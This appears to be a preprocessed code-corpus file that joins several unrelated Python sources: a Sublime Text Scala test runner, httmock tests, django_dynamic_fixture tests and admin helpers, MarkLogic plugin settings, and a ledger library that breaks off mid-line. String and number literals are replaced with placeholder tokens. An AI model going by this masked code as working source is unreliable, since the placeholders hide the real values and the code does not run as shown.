"<STR_LIT>" + runner + self . junit_args ( ) <EOL> command = wrap_in_cd ( self . base_dir , SCALA + "<STR_LIT:U+0020>" + scala_args ) <EOL> self . proc = subprocess . Popen ( command , shell = True , stdout = subprocess . PIPE , stderr = subprocess . PIPE ) <EOL> thread . start_new_thread ( self . read_stdout , ( ) ) <EOL> thread . start_new_thread ( self . read_stderr , ( ) ) <EOL> def relative_path_to_class_name ( self , partition_folder , relative_path , suffix ) : <EOL> return relative_path . rpartition ( partition_folder + "<STR_LIT:/>" ) [ <NUM_LIT:2> ] . replace ( "<STR_LIT:/>" , "<STR_LIT:.>" ) . 
replace ( suffix , "<STR_LIT>" ) <EOL> def read_stdout ( self ) : <EOL> self . copy_stream_to_output_view ( self . proc . stdout ) <EOL> def read_stderr ( self ) : <EOL> self . copy_stream_to_output_view ( self . proc . stderr ) <EOL> def copy_stream_to_output_view ( self , stream ) : <EOL> while True : <EOL> data = os . read ( stream . fileno ( ) , <NUM_LIT:2> ** <NUM_LIT:15> ) <EOL> if data != "<STR_LIT>" : <EOL> sublime . set_timeout ( functools . partial ( self . append_data , self . proc , data ) , <NUM_LIT:0> ) <EOL> else : <EOL> stream . close ( ) <EOL> break <EOL> def window ( self ) : <EOL> return self . view . window ( ) <EOL> def append_data ( self , proc , data ) : <EOL> self . output_view . set_read_only ( False ) <EOL> edit = self . output_view . begin_edit ( ) <EOL> self . output_view . insert ( edit , self . output_view . size ( ) , data ) <EOL> self . output_view . end_edit ( edit ) <EOL> self . output_view . set_read_only ( True ) <EOL> def show_tests_panel ( self ) : <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> self . output_view = self . window ( ) . get_output_panel ( "<STR_LIT>" ) <EOL> self . clear_test_view ( ) <EOL> self . window ( ) . run_command ( "<STR_LIT>" , { "<STR_LIT>" : "<STR_LIT>" } ) <EOL> def clear_test_view ( self ) : <EOL> self . output_view . set_read_only ( False ) <EOL> edit = self . output_view . begin_edit ( ) <EOL> self . output_view . erase ( edit , sublime . Region ( <NUM_LIT:0> , self . output_view . size ( ) ) ) <EOL> self . output_view . end_edit ( edit ) <EOL> self . output_view . set_read_only ( True ) <EOL> class ScalaTestCommand ( BaseScalaTestCommand ) : <EOL> def junit_args ( self ) : <EOL> return self . relative_path_to_class_name ( "<STR_LIT>" , self . view . file_name ( ) , "<STR_LIT>" ) <EOL> class ScalaTestAllCommand ( BaseScalaTestCommand ) : <EOL> def junit_args ( self ) : <EOL> matches = [ ] <EOL> for root , dirnames , filenames in os . walk ( self . 
base_dir + '<STR_LIT>' ) : <EOL> for filename in fnmatch . filter ( filenames , '<STR_LIT>' ) : <EOL> matches . append ( self . relative_path_to_class_name ( "<STR_LIT>" , os . path . join ( root , filename ) , "<STR_LIT>" ) ) <EOL> test_classes = "<STR_LIT:U+0020>" . join ( matches ) <EOL> return test_classes <EOL> class JumpToScalaFile ( sublime_plugin . TextCommand ) : <EOL> def run ( self , edit ) : <EOL> self . base_dir = self . view . file_name ( ) . partition ( "<STR_LIT>" ) [ <NUM_LIT:0> ] <EOL> self . files = [ ] <EOL> for root , dirnames , filenames in os . walk ( self . base_dir ) : <EOL> for filename in fnmatch . filter ( filenames , '<STR_LIT>' ) : <EOL> self . files . append ( os . path . join ( root , filename ) ) <EOL> file_names = map ( lambda x : os . path . split ( x ) [ <NUM_LIT:1> ] , self . files ) <EOL> sublime . active_window ( ) . show_quick_panel ( file_names , self . file_selected ) <EOL> def file_selected ( self , selected_index ) : <EOL> if selected_index != - <NUM_LIT:1> : <EOL> sublime . active_window ( ) . open_file ( self . files [ selected_index ] ) <EOL> def wrap_in_cd ( path , command ) : <EOL> return '<STR_LIT>' + path . replace ( "<STR_LIT:\\>" , "<STR_LIT:/>" ) + '<STR_LIT>' + command </s>
<s> import requests <EOL> import sys <EOL> import unittest <EOL> from httmock import ( all_requests , response , urlmatch , with_httmock , HTTMock , <EOL> text_type , binary_type ) <EOL> @ urlmatch ( scheme = '<STR_LIT>' ) <EOL> def unmatched_scheme ( url , request ) : <EOL> raise AssertionError ( '<STR_LIT>' ) <EOL> @ urlmatch ( path = r'<STR_LIT>' ) <EOL> def unmatched_path ( url , request ) : <EOL> raise AssertionError ( '<STR_LIT>' ) <EOL> @ urlmatch ( method = '<STR_LIT>' ) <EOL> def unmatched_method ( url , request ) : <EOL> raise AssertionError ( '<STR_LIT>' ) <EOL> @ urlmatch ( netloc = r'<STR_LIT>' , path = r'<STR_LIT>' ) <EOL> def google_mock ( url , request ) : <EOL> return '<STR_LIT>' <EOL> @ urlmatch ( scheme = '<STR_LIT:http>' , netloc = r'<STR_LIT>' ) <EOL> def facebook_mock ( url , request ) : <EOL> return '<STR_LIT>' <EOL> def any_mock ( url , request ) : <EOL> return '<STR_LIT>' % ( url . netloc , ) <EOL> def dict_any_mock ( url , request ) : <EOL> return { <EOL> '<STR_LIT:content>' : '<STR_LIT>' % ( url . netloc , ) , <EOL> '<STR_LIT>' : <NUM_LIT:200> <EOL> } <EOL> def example_400_response ( url , response ) : <EOL> r = requests . Response ( ) <EOL> r . status_code = <NUM_LIT> <EOL> r . _content = b'<STR_LIT>' <EOL> return r <EOL> class MockTest ( unittest . TestCase ) : <EOL> def test_return_type ( self ) : <EOL> with HTTMock ( any_mock ) : <EOL> r = requests . get ( '<STR_LIT>' ) <EOL> self . assertTrue ( isinstance ( r , requests . Response ) ) <EOL> self . assertTrue ( isinstance ( r . content , binary_type ) ) <EOL> self . assertTrue ( isinstance ( r . text , text_type ) ) <EOL> def test_scheme_fallback ( self ) : <EOL> with HTTMock ( unmatched_scheme , any_mock ) : <EOL> r = requests . get ( '<STR_LIT>' ) <EOL> self . assertEqual ( r . content , b'<STR_LIT>' ) <EOL> def test_path_fallback ( self ) : <EOL> with HTTMock ( unmatched_path , any_mock ) : <EOL> r = requests . get ( '<STR_LIT>' ) <EOL> self . assertEqual ( r . 
content , b'<STR_LIT>' ) <EOL> def test_method_fallback ( self ) : <EOL> with HTTMock ( unmatched_method , any_mock ) : <EOL> r = requests . get ( '<STR_LIT>' ) <EOL> self . assertEqual ( r . content , b'<STR_LIT>' ) <EOL> def test_netloc_fallback ( self ) : <EOL> with HTTMock ( google_mock , facebook_mock ) : <EOL> r = requests . get ( '<STR_LIT>' ) <EOL> self . assertEqual ( r . content , b'<STR_LIT>' ) <EOL> with HTTMock ( google_mock , facebook_mock ) : <EOL> r = requests . get ( '<STR_LIT>' ) <EOL> self . assertEqual ( r . content , b'<STR_LIT>' ) <EOL> def test_400_response ( self ) : <EOL> with HTTMock ( example_400_response ) : <EOL> r = requests . get ( '<STR_LIT>' ) <EOL> self . assertEqual ( r . status_code , <NUM_LIT> ) <EOL> self . assertEqual ( r . content , b'<STR_LIT>' ) <EOL> def test_real_request_fallback ( self ) : <EOL> with HTTMock ( any_mock ) : <EOL> with HTTMock ( google_mock , facebook_mock ) : <EOL> r = requests . get ( '<STR_LIT>' ) <EOL> self . assertEqual ( r . status_code , <NUM_LIT:200> ) <EOL> self . assertEqual ( r . content , b'<STR_LIT>' ) <EOL> def test_invalid_intercept_response_raises_value_error ( self ) : <EOL> @ all_requests <EOL> def response_content ( url , request ) : <EOL> return - <NUM_LIT:1> <EOL> with HTTMock ( response_content ) : <EOL> self . assertRaises ( TypeError , requests . get , '<STR_LIT>' ) <EOL> class DecoratorTest ( unittest . TestCase ) : <EOL> @ with_httmock ( any_mock ) <EOL> def test_decorator ( self ) : <EOL> r = requests . get ( '<STR_LIT>' ) <EOL> self . assertEqual ( r . content , b'<STR_LIT>' ) <EOL> @ with_httmock ( any_mock ) <EOL> def test_iter_lines ( self ) : <EOL> r = requests . get ( '<STR_LIT>' ) <EOL> self . assertEqual ( list ( r . iter_lines ( ) ) , <EOL> [ b'<STR_LIT>' ] ) <EOL> class AllRequestsDecoratorTest ( unittest . 
TestCase ) : <EOL> def test_all_requests_response ( self ) : <EOL> @ all_requests <EOL> def response_content ( url , request ) : <EOL> return { '<STR_LIT>' : <NUM_LIT:200> , '<STR_LIT:content>' : '<STR_LIT>' } <EOL> with HTTMock ( response_content ) : <EOL> r = requests . get ( '<STR_LIT>' ) <EOL> self . assertEqual ( r . status_code , <NUM_LIT:200> ) <EOL> self . assertEqual ( r . content , b'<STR_LIT>' ) <EOL> def test_all_str_response ( self ) : <EOL> @ all_requests <EOL> def response_content ( url , request ) : <EOL> return '<STR_LIT>' <EOL> with HTTMock ( response_content ) : <EOL> r = requests . get ( '<STR_LIT>' ) <EOL> self . assertEqual ( r . content , b'<STR_LIT>' ) <EOL> class AllRequestsMethodDecoratorTest ( unittest . TestCase ) : <EOL> @ all_requests <EOL> def response_content ( self , url , request ) : <EOL> return { '<STR_LIT>' : <NUM_LIT:200> , '<STR_LIT:content>' : '<STR_LIT>' } <EOL> def test_all_requests_response ( self ) : <EOL> with HTTMock ( self . response_content ) : <EOL> r = requests . get ( '<STR_LIT>' ) <EOL> self . assertEqual ( r . status_code , <NUM_LIT:200> ) <EOL> self . assertEqual ( r . content , b'<STR_LIT>' ) <EOL> @ all_requests <EOL> def string_response_content ( self , url , request ) : <EOL> return '<STR_LIT>' <EOL> def test_all_str_response ( self ) : <EOL> with HTTMock ( self . string_response_content ) : <EOL> r = requests . get ( '<STR_LIT>' ) <EOL> self . assertEqual ( r . content , b'<STR_LIT>' ) <EOL> class UrlMatchMethodDecoratorTest ( unittest . 
TestCase ) : <EOL> @ urlmatch ( netloc = r'<STR_LIT>' , path = r'<STR_LIT>' ) <EOL> def google_mock ( self , url , request ) : <EOL> return '<STR_LIT>' <EOL> @ urlmatch ( scheme = '<STR_LIT:http>' , netloc = r'<STR_LIT>' ) <EOL> def facebook_mock ( self , url , request ) : <EOL> return '<STR_LIT>' <EOL> @ urlmatch ( query = r'<STR_LIT>' ) <EOL> def query_page_mock ( self , url , request ) : <EOL> return '<STR_LIT>' <EOL> def test_netloc_fallback ( self ) : <EOL> with HTTMock ( self . google_mock , facebook_mock ) : <EOL> r = requests . get ( '<STR_LIT>' ) <EOL> self . assertEqual ( r . content , b'<STR_LIT>' ) <EOL> with HTTMock ( self . google_mock , facebook_mock ) : <EOL> r = requests . get ( '<STR_LIT>' ) <EOL> self . assertEqual ( r . content , b'<STR_LIT>' ) <EOL> def test_query ( self ) : <EOL> with HTTMock ( self . query_page_mock , self . google_mock ) : <EOL> r = requests . get ( '<STR_LIT>' ) <EOL> r2 = requests . get ( '<STR_LIT>' ) <EOL> self . assertEqual ( r . content , b'<STR_LIT>' ) <EOL> self . assertEqual ( r2 . content , b'<STR_LIT>' ) <EOL> class ResponseTest ( unittest . TestCase ) : <EOL> content = { '<STR_LIT:name>' : '<STR_LIT:foo>' , '<STR_LIT>' : '<STR_LIT:127.0.0.1>' } <EOL> content_list = list ( content . keys ( ) ) <EOL> def test_response_auto_json ( self ) : <EOL> r = response ( <NUM_LIT:0> , self . content ) <EOL> self . assertTrue ( isinstance ( r . content , binary_type ) ) <EOL> self . assertTrue ( isinstance ( r . text , text_type ) ) <EOL> self . assertEqual ( r . json ( ) , self . content ) <EOL> r = response ( <NUM_LIT:0> , self . content_list ) <EOL> self . assertEqual ( r . json ( ) , self . content_list ) <EOL> def test_response_status_code ( self ) : <EOL> r = response ( <NUM_LIT:200> ) <EOL> self . assertEqual ( r . status_code , <NUM_LIT:200> ) <EOL> def test_response_headers ( self ) : <EOL> r = response ( <NUM_LIT:200> , None , { '<STR_LIT:Content-Type>' : '<STR_LIT:application/json>' } ) <EOL> self . assertEqual ( r . 
headers [ '<STR_LIT>' ] , '<STR_LIT:application/json>' ) <EOL> def test_response_cookies ( self ) : <EOL> @ all_requests <EOL> def response_content ( url , request ) : <EOL> return response ( <NUM_LIT:200> , '<STR_LIT>' , { '<STR_LIT>' : '<STR_LIT>' } , <EOL> request = request ) <EOL> with HTTMock ( response_content ) : <EOL> r = requests . get ( '<STR_LIT>' ) <EOL> self . assertEqual ( len ( r . cookies ) , <NUM_LIT:1> ) <EOL> self . assertTrue ( '<STR_LIT:foo>' in r . cookies ) <EOL> self . assertEqual ( r . cookies [ '<STR_LIT:foo>' ] , '<STR_LIT:bar>' ) <EOL> def test_python_version_encoding_differences ( self ) : <EOL> @ all_requests <EOL> def get_mock ( url , request ) : <EOL> return { '<STR_LIT:content>' : self . content , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:application/json>' } , <EOL> '<STR_LIT>' : <NUM_LIT:200> , <EOL> '<STR_LIT>' : <NUM_LIT:5> } <EOL> with HTTMock ( get_mock ) : <EOL> response = requests . get ( '<STR_LIT>' ) <EOL> self . assertEqual ( self . content , response . json ( ) ) <EOL> def test_mock_redirect ( self ) : <EOL> @ urlmatch ( netloc = '<STR_LIT>' ) <EOL> def get_mock ( url , request ) : <EOL> return { '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } <EOL> with HTTMock ( get_mock , google_mock ) : <EOL> response = requests . get ( '<STR_LIT>' ) <EOL> self . assertEqual ( len ( response . history ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( response . content , b'<STR_LIT>' ) <EOL> class StreamTest ( unittest . TestCase ) : <EOL> @ with_httmock ( any_mock ) <EOL> def test_stream_request ( self ) : <EOL> r = requests . get ( '<STR_LIT>' , stream = True ) <EOL> self . assertEqual ( r . raw . read ( ) , b'<STR_LIT>' ) <EOL> @ with_httmock ( dict_any_mock ) <EOL> def test_stream_request_with_dict_mock ( self ) : <EOL> r = requests . get ( '<STR_LIT>' , stream = True ) <EOL> self . assertEqual ( r . raw . 
read ( ) , b'<STR_LIT>' ) <EOL> @ with_httmock ( any_mock ) <EOL> def test_non_stream_request ( self ) : <EOL> r = requests . get ( '<STR_LIT>' ) <EOL> self . assertEqual ( r . raw . read ( ) , b'<STR_LIT>' ) </s>
<s> from django . db import models <EOL> from datetime import datetime , date <EOL> from decimal import Decimal <EOL> import six <EOL> from six . moves import xrange <EOL> from django_dynamic_fixture . django_helper import django_greater_than <EOL> class DataFixtureTestCase ( object ) : <EOL> def setUp ( self ) : <EOL> self . fixture = None <EOL> def test_numbers ( self ) : <EOL> self . assertTrue ( isinstance ( self . fixture . generate_data ( models . IntegerField ( ) ) , int ) ) <EOL> self . assertTrue ( isinstance ( self . fixture . generate_data ( models . SmallIntegerField ( ) ) , int ) ) <EOL> self . assertTrue ( isinstance ( self . fixture . generate_data ( models . PositiveIntegerField ( ) ) , int ) ) <EOL> self . assertTrue ( isinstance ( self . fixture . generate_data ( models . PositiveSmallIntegerField ( ) ) , int ) ) <EOL> self . assertTrue ( isinstance ( self . fixture . generate_data ( models . BigIntegerField ( ) ) , int ) ) <EOL> self . assertTrue ( isinstance ( self . fixture . generate_data ( models . FloatField ( ) ) , float ) ) <EOL> self . assertTrue ( isinstance ( self . fixture . generate_data ( models . DecimalField ( max_digits = <NUM_LIT:1> , decimal_places = <NUM_LIT:1> ) ) , Decimal ) ) <EOL> def test_it_must_deal_with_decimal_max_digits ( self ) : <EOL> for _ in xrange ( <NUM_LIT:11> ) : <EOL> self . assertTrue ( isinstance ( self . fixture . generate_data ( models . DecimalField ( max_digits = <NUM_LIT:1> , decimal_places = <NUM_LIT:1> ) ) , Decimal ) ) <EOL> self . assertTrue ( isinstance ( self . fixture . generate_data ( models . DecimalField ( max_digits = <NUM_LIT:2> , decimal_places = <NUM_LIT:1> ) ) , Decimal ) ) <EOL> def test_strings ( self ) : <EOL> self . assertTrue ( isinstance ( self . fixture . generate_data ( models . CharField ( max_length = <NUM_LIT:1> ) ) , six . text_type ) ) <EOL> self . assertTrue ( isinstance ( self . fixture . generate_data ( models . TextField ( ) ) , six . text_type ) ) <EOL> self . 
assertTrue ( isinstance ( self . fixture . generate_data ( models . SlugField ( max_length = <NUM_LIT:1> ) ) , six . text_type ) ) <EOL> self . assertTrue ( isinstance ( self . fixture . generate_data ( models . CommaSeparatedIntegerField ( max_length = <NUM_LIT:1> ) ) , six . text_type ) ) <EOL> def test_new_truncate_strings_to_max_length ( self ) : <EOL> for _ in range ( <NUM_LIT:12> ) : <EOL> self . assertTrue ( isinstance ( self . fixture . generate_data ( models . CharField ( max_length = <NUM_LIT:1> ) ) , six . text_type ) ) <EOL> def test_boolean ( self ) : <EOL> self . assertTrue ( isinstance ( self . fixture . generate_data ( models . BooleanField ( ) ) , bool ) ) <EOL> value = self . fixture . generate_data ( models . NullBooleanField ( ) ) <EOL> self . assertTrue ( isinstance ( value , bool ) or value == None ) <EOL> def test_date_time_related ( self ) : <EOL> self . assertTrue ( isinstance ( self . fixture . generate_data ( models . DateField ( ) ) , date ) ) <EOL> self . assertTrue ( isinstance ( self . fixture . generate_data ( models . TimeField ( ) ) , datetime ) ) <EOL> self . assertTrue ( isinstance ( self . fixture . generate_data ( models . DateTimeField ( ) ) , datetime ) ) <EOL> def test_formatted_strings ( self ) : <EOL> self . assertTrue ( isinstance ( self . fixture . generate_data ( models . EmailField ( max_length = <NUM_LIT:100> ) ) , six . text_type ) ) <EOL> self . assertTrue ( isinstance ( self . fixture . generate_data ( models . URLField ( max_length = <NUM_LIT:100> ) ) , six . text_type ) ) <EOL> self . assertTrue ( isinstance ( self . fixture . generate_data ( models . IPAddressField ( max_length = <NUM_LIT:100> ) ) , six . text_type ) ) <EOL> if django_greater_than ( '<STR_LIT>' ) : <EOL> self . assertTrue ( isinstance ( self . fixture . generate_data ( models . GenericIPAddressField ( max_length = <NUM_LIT:100> ) ) , six . text_type ) ) <EOL> def test_files ( self ) : <EOL> self . assertTrue ( isinstance ( self . fixture . 
generate_data ( models . FilePathField ( max_length = <NUM_LIT:100> ) ) , six . text_type ) ) <EOL> self . assertTrue ( isinstance ( self . fixture . generate_data ( models . FileField ( ) ) , six . text_type ) ) <EOL> try : <EOL> import pil <EOL> self . assertTrue ( isinstance ( self . fixture . generate_data ( models . ImageField ( max_length = <NUM_LIT:100> ) ) , six . text_type ) ) <EOL> except ImportError : <EOL> pass </s>
<s> import six <EOL> from django . contrib import admin <EOL> from django . contrib . admin . sites import AlreadyRegistered <EOL> from django . core . urlresolvers import reverse <EOL> from django . db . models import * <EOL> from . django_helper import * <EOL> ADMIN_FIELDS = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> def create_admin_inline_class ( model , inline_class = admin . TabularInline ) : <EOL> """<STR_LIT>""" <EOL> attrs = { } <EOL> attrs [ '<STR_LIT>' ] = model <EOL> return type ( get_model_name ( model ) + '<STR_LIT>' , ( inline_class , ) , attrs ) <EOL> def create_admin_class ( model , ** kwargs ) : <EOL> model_admin_class = type ( get_model_name ( model ) + '<STR_LIT>' , ( admin . ModelAdmin , ) , kwargs ) <EOL> return model_admin_class <EOL> def register_admin_class ( model , admin_class , override = False ) : <EOL> try : <EOL> admin . site . register ( model , admin_class ) <EOL> return admin_class <EOL> except AlreadyRegistered : <EOL> if override : <EOL> admin . site . unregister ( model ) <EOL> admin . site . register ( model , admin_class ) <EOL> return admin_class <EOL> else : <EOL> return get_registered_admin ( model ) <EOL> def get_registered_admin ( model ) : <EOL> return admin . site . _registry [ model ] . __class__ <EOL> def get_admin_change_link ( model , obj_id ) : <EOL> app_label = model . _meta . 
app_label <EOL> model_name = get_model_name ( model ) <EOL> name = '<STR_LIT>' % ( model_name , obj_id ) <EOL> reverse_url = '<STR_LIT>' % ( app_label . lower ( ) , model_name . lower ( ) ) <EOL> url = reverse ( reverse_url , args = ( obj_id , ) ) <EOL> try : <EOL> from django . utils . html import format_html <EOL> except ImportError : <EOL> from django . utils . safestring import mark_safe <EOL> def conditional_escape ( text ) : <EOL> if isinstance ( text , SafeData ) : <EOL> return text <EOL> else : <EOL> return escape ( text ) <EOL> def format_html ( format_string , * args , ** kwargs ) : <EOL> args_safe = map ( conditional_escape , args ) <EOL> kwargs_safe = dict ( [ ( k , conditional_escape ( v ) ) for ( k , v ) in six . iteritems ( kwargs ) ] ) <EOL> return mark_safe ( format_string . format ( * args_safe , ** kwargs_safe ) ) <EOL> return format_html ( '<STR_LIT>' % ( url , name ) ) <EOL> def print_model_admin ( admin_class ) : <EOL> for field in ADMIN_FIELDS : <EOL> value = admin_class . __dict__ . get ( field , None ) <EOL> if value : <EOL> print ( '<STR_LIT>' % ( field , value ) ) </s>
<s> VERSION = '<STR_LIT>' </s>
<s> import sublime <EOL> import os <EOL> import re <EOL> import glob <EOL> from . ml_options import MlOptions <EOL> from . roxy_options import RoxyOptions <EOL> SETTINGS_FILE = "<STR_LIT>" <EOL> class MlSettings : <EOL> _stored_search_paths = None <EOL> _search_paths = None <EOL> _sublime_options = None <EOL> @ staticmethod <EOL> def merge_dicts ( dict1 , dict2 ) : <EOL> for key in dict2 : <EOL> value = dict2 [ key ] <EOL> if ( ( key in dict1 ) and isinstance ( value , dict ) ) : <EOL> MlSettings . merge_dicts ( dict1 [ key ] , value ) <EOL> else : <EOL> dict1 [ key ] = value <EOL> @ staticmethod <EOL> def settings ( ) : <EOL> if ( not MlSettings . _sublime_options ) : <EOL> default_file = os . path . join ( "<STR_LIT>" , "<STR_LIT>" , SETTINGS_FILE ) <EOL> user_file = os . path . join ( sublime . packages_path ( ) , "<STR_LIT>" , SETTINGS_FILE ) <EOL> default_options = MlOptions ( default_file ) <EOL> MlSettings . _sublime_options = default_options . options . copy ( ) <EOL> if ( os . path . exists ( user_file ) ) : <EOL> user_options = MlOptions ( user_file ) <EOL> MlSettings . merge_dicts ( MlSettings . _sublime_options , user_options . options ) <EOL> return MlSettings . _sublime_options <EOL> def write_settings_sub_pref ( self , key , sub_key , value ) : <EOL> user_file = os . path . join ( sublime . packages_path ( ) , "<STR_LIT>" , SETTINGS_FILE ) <EOL> user_options = MlOptions ( user_file ) <EOL> user_options . set_sub_pref ( key , sub_key , value ) <EOL> def __init__ ( self ) : <EOL> self . _roxy_options = None <EOL> self . _proj_options = None <EOL> def get_search_paths ( self ) : <EOL> stored_search_paths = self . get_xcc_pref ( "<STR_LIT>" ) <EOL> if ( not stored_search_paths ) : <EOL> return None <EOL> if ( not isinstance ( stored_search_paths , list ) ) : <EOL> stored_search_paths = [ stored_search_paths ] <EOL> if ( stored_search_paths != MlSettings . _stored_search_paths ) : <EOL> MlSettings . 
_stored_search_paths = stored_search_paths <EOL> resolved_search_paths = [ ] <EOL> for search_path in stored_search_paths : <EOL> if os . path . exists ( search_path ) : <EOL> resolved_search_paths . append ( search_path ) <EOL> else : <EOL> current_options_file = self . get_current_options_file ( ) <EOL> if ( re . match ( SETTINGS_FILE , current_options_file ) == None ) : <EOL> root_folder = os . path . dirname ( current_options_file ) <EOL> for found_path in glob . glob ( os . path . join ( root_folder , search_path ) ) : <EOL> resolved_search_paths . append ( found_path ) <EOL> MlSettings . _search_paths = resolved_search_paths <EOL> return MlSettings . _search_paths <EOL> def projectOptions ( self ) : <EOL> if not self . _proj_options : <EOL> self . _proj_options = MlOptions ( ) <EOL> return self . _proj_options <EOL> def roxyOptions ( self ) : <EOL> if not self . _roxy_options : <EOL> self . _roxy_options = RoxyOptions ( self . roxy_env ( ) ) <EOL> return self . _roxy_options <EOL> def roxy_env ( self ) : <EOL> return MlSettings . settings ( ) . get ( "<STR_LIT>" ) . get ( "<STR_LIT>" ) or "<STR_LIT>" <EOL> def use_roxy ( self ) : <EOL> return MlSettings . settings ( ) . get ( "<STR_LIT>" ) . get ( "<STR_LIT>" ) == True <EOL> def get_pref ( self , key ) : <EOL> if self . projectOptions ( ) . has_key ( key ) : <EOL> return self . projectOptions ( ) . get ( key ) <EOL> elif ( self . use_roxy ( ) == True and self . roxyOptions ( ) . has_key ( key ) ) : <EOL> return self . roxyOptions ( ) . get ( key ) <EOL> return self . settings ( ) . get ( key ) <EOL> def get_sub_pref ( self , key , sub_key ) : <EOL> if self . projectOptions ( ) . has_subkey ( key , sub_key ) : <EOL> return self . projectOptions ( ) . get_sub_pref ( key , sub_key ) <EOL> if ( self . use_roxy ( ) == True and self . roxyOptions ( ) . has_key ( sub_key ) ) : <EOL> return self . roxyOptions ( ) . get ( sub_key ) <EOL> return self . settings ( ) . get ( key ) . 
get ( sub_key ) <EOL> def set_sub_pref ( self , key , sub_key , value ) : <EOL> if self . projectOptions ( ) . has_key ( key ) : <EOL> self . projectOptions ( ) . set_sub_pref ( key , sub_key , value ) <EOL> elif ( self . use_roxy ( ) == True and self . roxyOptions ( ) . has_key ( key ) ) : <EOL> return <EOL> else : <EOL> o = self . settings ( ) . get ( key ) <EOL> o [ sub_key ] = value <EOL> self . settings ( ) [ key ] = o <EOL> self . write_settings_sub_pref ( key , sub_key , value ) <EOL> def get_xcc_pref ( self , key ) : <EOL> return self . get_sub_pref ( "<STR_LIT>" , key ) <EOL> def set_xcc_pref ( self , key , value ) : <EOL> self . set_sub_pref ( "<STR_LIT>" , key , value ) <EOL> def set_content_db ( self , name ) : <EOL> self . set_xcc_pref ( "<STR_LIT>" , name ) <EOL> def set_modules_db ( self , name ) : <EOL> self . set_xcc_pref ( "<STR_LIT>" , name ) <EOL> def set_lint_on_save ( self , value ) : <EOL> self . set_sub_pref ( "<STR_LIT>" , "<STR_LIT>" , value ) <EOL> def get_current_options_file ( self ) : <EOL> options_file = self . projectOptions ( ) . options_file ( ) <EOL> if options_file : <EOL> return options_file <EOL> if ( self . use_roxy ( ) ) : <EOL> options_file = self . roxyOptions ( ) . options_file ( ) <EOL> if options_file : <EOL> return options_file <EOL> return os . path . join ( sublime . packages_path ( ) , "<STR_LIT>" , SETTINGS_FILE ) <EOL> @ staticmethod <EOL> def debug ( ) : <EOL> return MlSettings . settings ( ) . get ( "<STR_LIT>" ) == True <EOL> @ staticmethod <EOL> def lint_scroll_to_error ( ) : <EOL> return MlSettings . settings ( ) . get ( "<STR_LIT>" ) . get ( "<STR_LIT>" ) == True <EOL> @ staticmethod <EOL> def lint_highlight_selected_regions ( ) : <EOL> return MlSettings . settings ( ) . get ( "<STR_LIT>" ) . get ( "<STR_LIT>" ) == True <EOL> @ staticmethod <EOL> def lint_on_edit ( ) : <EOL> return MlSettings . settings ( ) . get ( "<STR_LIT>" ) . 
get ( "<STR_LIT>" ) == True <EOL> @ staticmethod <EOL> def lint_on_edit_timeout ( ) : <EOL> return MlSettings . settings ( ) . get ( "<STR_LIT>" ) . get ( "<STR_LIT>" ) <EOL> @ staticmethod <EOL> def lint_on_save ( ) : <EOL> return MlSettings . settings ( ) . get ( "<STR_LIT>" ) . get ( "<STR_LIT>" ) == True <EOL> @ staticmethod <EOL> def lint_on_load ( ) : <EOL> return MlSettings . settings ( ) . get ( "<STR_LIT>" ) . get ( "<STR_LIT>" ) == True <EOL> @ staticmethod <EOL> def enable_marklogic_functions ( ) : <EOL> return MlSettings . settings ( ) . get ( "<STR_LIT>" ) . get ( "<STR_LIT>" ) == True </s>
<s> from support . group import Group </s>
<s> from pledger . transaction import Transaction <EOL> from pledger . ledger_processor import LedgerProcessor <EOL> import itertools <EOL> import os . path <EOL> class Ledger ( object ) : <EOL> def __init__ ( self , filename , transactions , parser ) : <EOL> self . filename = filename <EOL> self . transactions = transactions <EOL> self . parser = parser <EOL> def absolute_filename ( self , filename ) : <EOL> if os . path . isabs ( filename ) : return filename <EOL> dir = os . path . dirname ( self . filename ) <EOL> return os . path . join ( dir , filename ) </s>
<s> import unittest <EOL> from decimal import Decimal , InvalidOperation <EOL> from pledger . value import Value , ZERO <EOL> class SingleCurrency ( unittest . TestCase ) : <EOL> def testSumNull ( self ) : <EOL> value = Value ( { "<STR_LIT>" : Decimal ( <NUM_LIT:32> ) } ) <EOL> self . assertEqual ( value , value + ZERO ) <EOL> def testParsing ( self ) : <EOL> value = Value ( { "<STR_LIT>" : Decimal ( "<STR_LIT>" ) } ) <EOL> self . assertEqual ( value , Value . parse ( "<STR_LIT>" ) ) <EOL> def testParseNoCurrency ( self ) : <EOL> self . assertRaises ( InvalidOperation , Value . parse ( "<STR_LIT>" ) ) <EOL> def testParseInvalidDecimal ( self ) : <EOL> self . assertRaises ( ValueError , Value . parse ( "<STR_LIT>" ) ) <EOL> def testCurrencies ( self ) : <EOL> value = Value ( { "<STR_LIT>" : Decimal ( "<STR_LIT>" ) } ) <EOL> self . assertEqual ( [ "<STR_LIT>" ] , list ( value . currencies ( ) ) ) <EOL> def testComponents ( self ) : <EOL> value = Value ( { "<STR_LIT>" : Decimal ( "<STR_LIT>" ) } ) <EOL> self . assertEqual ( [ value ] , list ( value . components ( ) ) ) <EOL> self . assertEqual ( [ value ] , list ( value . components ( [ "<STR_LIT>" ] ) ) ) <EOL> self . assertEqual ( [ ZERO ] , list ( value . components ( [ "<STR_LIT>" ] ) ) ) <EOL> self . assertEqual ( [ ZERO ] , list ( value . components ( [ ] ) ) ) <EOL> def testNeg ( self ) : <EOL> amount = Decimal ( "<STR_LIT>" ) <EOL> value = Value ( { 